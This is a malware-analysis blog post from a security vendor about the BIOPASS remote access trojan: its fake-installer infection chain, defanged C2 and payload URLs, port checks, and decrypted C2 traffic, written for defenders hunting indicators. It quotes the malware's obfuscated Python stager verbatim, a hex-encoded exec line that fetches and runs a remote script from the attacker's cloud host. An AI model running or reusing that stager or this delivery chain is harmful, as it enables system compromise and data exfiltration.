SecneurX has been observing a RAT (Remote Access Trojan) behaviour which is targeting users of Windows systems through the watering hole attack. This RAT is now referred as BIOPASS RAT.
The details shared in this blog are from the artifacts acquired from the wild using SecneurX acquisition Engine. SecneurX analysed these artifacts using SecneurX Advanced Dynamic Malware Analysis Platform and generated IOC’s (Indicators of Compromise), Malware’s behavioural analysis report and Threat Signatures that can be consumed by SOC / Security Analysts.
Victims are tricked into downloading a malware loader which is disguised as a legitimate installer like Adobe Flash Player or Microsoft Silverlight. This malware sets up a back-door entry for the Command & Control (C2) to control the victim’s system. It then downloads a tool-kit containing many tools to, capture screen shots, stream desktop content, steal credentials etc and waits for C2 to initiate the commands. Next, it establishes a socket connection with C2 that is running on a public cloud to exfiltrate data.
This malware has the potential to cause serious data exfiltration. It is important to watch your logs for any IOC’s mentioned at the end of this blog. A detailed analysis of the behaviour of BIOPASS RAT with network and process information is being discussed in-detail for interested readers. Preventive steps can be taken based on the IOC’s and behavioural report attached in this blog.
An analysis of the threat scenario is explained below.
Victims are tricked to download the malicious installers like Flash, Silverlight when they access compromised websites.
While installing, the malware downloads the genuine flash or silverlight installer from their custom source, like in this url.
hxxp://softres[.]oss-accelerate[.]aliyuncs[.]com/Silverlight[.]exe
The malware downloads a script (Python) from C2.
hxxp://lualibs[.]oss-cn-hongkong[.]aliyuncs[.]com/x86/1-CS-443[.]lua
This python script checks if the machine is already compromised or not, by checking whether there are listeners in specific port numbers - 43990, 43992, 53990, 33990, 33890, 48990, 12880, 22880, 32880, 42880, 52880, 62880
If the machine is not compromised already, it downloads subsequent payload.
hxxp://lualibs[.]oss-cn-hongkong[.]aliyuncs[.]com/x86/Schedule[.]lua
hxxp://lualibs[.]oss-accelerate[.]aliyuncs[.]com/x86/ScheduleTask[.]dll
hxxp://softres[.]oss-accelerate[.]aliyuncs[.]com/ShellExperienceHost[.]zip
The final payload was an obfuscated payload as listed below. It was decoded to extract the BIOPASS RAT payload url.
Obfuscated payload
"exec(b''.fromhex('696d706f72742075726c6c69622e726571756573743b657865632875726c6c69622e726571756573742e75726c6f70656e2875726c6c69622e726571756573742e526571756573742827687474703a2f2f666c617368646f776e6c6f61647365727665722e6f73732d616363656c65726174652e616c6979756e63732e636f6d2f72322f626967322e70792729292e7265616428292e6465636f6465282929').decode())"
BIOPASS RAT URL after decoding
hxxp://flashdownloadserver.oss-accelerate[.]aliyuncs[.]com/r2/big2.py
The payload that was downloaded as mentioned in Step 4, contains a Toolkit that was downloaded from below URL.
hxxp://softres[.]oss-accelerate[.]aliyuncs[.]com/ShellExperienceHost[.]zip
The contents of the toolkit is shown in the below image. The toolkit contains python environment and its dependencies.
The BIOPASS RAT malicious script is downloaded from the below URL.
hxxp://flashdownloadserver.oss-accelerate.aliyuncs[.]com/r2/big2.py
To periodically start these dowloaded binaries, an entry is created in the Task scheduler.
BIOPASS malware script contains following tasks which can be initiated by the C2 to execute
This Malware can also deploy the cobalt strike payload from the below URL which was obfuscated in the code
hxxp://flashdownloadserver[.]oss-cn-hongkong[.]aliyuncs[.]com/res/c1222.txt
Payload:
Communication between the infected node and C2 is base85 encoded , compressed and AES encrypted.
Encrypted data
42["join",{"type":"client","data":"c$@*?03ZJ>jH4D#UVpo?^o7<}6%{}fj4Jv$ey?7woLCG3L!Pm^m)lSCttTFO7D$5<X6BZHa1nx)c>OG(KaGrvxrSQd(1I1tfz!&K08>;NY1S_`J<a&pbp*w^~_m80=BEu9&gKLyp*oYc7nk>4S(7+9BCV_an;BR4a`Ws|@yGxqYJdJ3>FixK5Q)ix8W@b~cnwK4K`D$#%B0div=dos=htppsbZx4Qh=@QEkVEVI72G7t>wy@u~0{zd#NJPIskliVsu=np$e^v5e1pSn)8T-{UJJW|MCWob("}]
Decrypted data:
{"do": "k", "ips": "192.168.17.132", "public_ip": "157.49.4.95", "osv": "Windows 7 x64", "cuser": "win-l842sfcie1t\\administrator", "pid": 2760, "key": "null", "uid": "1", "av": "N/A", "city": " \u70\ua6"}
C2 issues multiple commands like grab a screen shot, get browser history or stream the desktop and the Malware will execute and exfiltrate those data.
Indicators of Compromise
Conclusion
Given the nature of the malware, we advise users to be careful with regard to the applications that they download. Organisations can take preventive steps based on the IOC’s and behavioural report attached in this blog.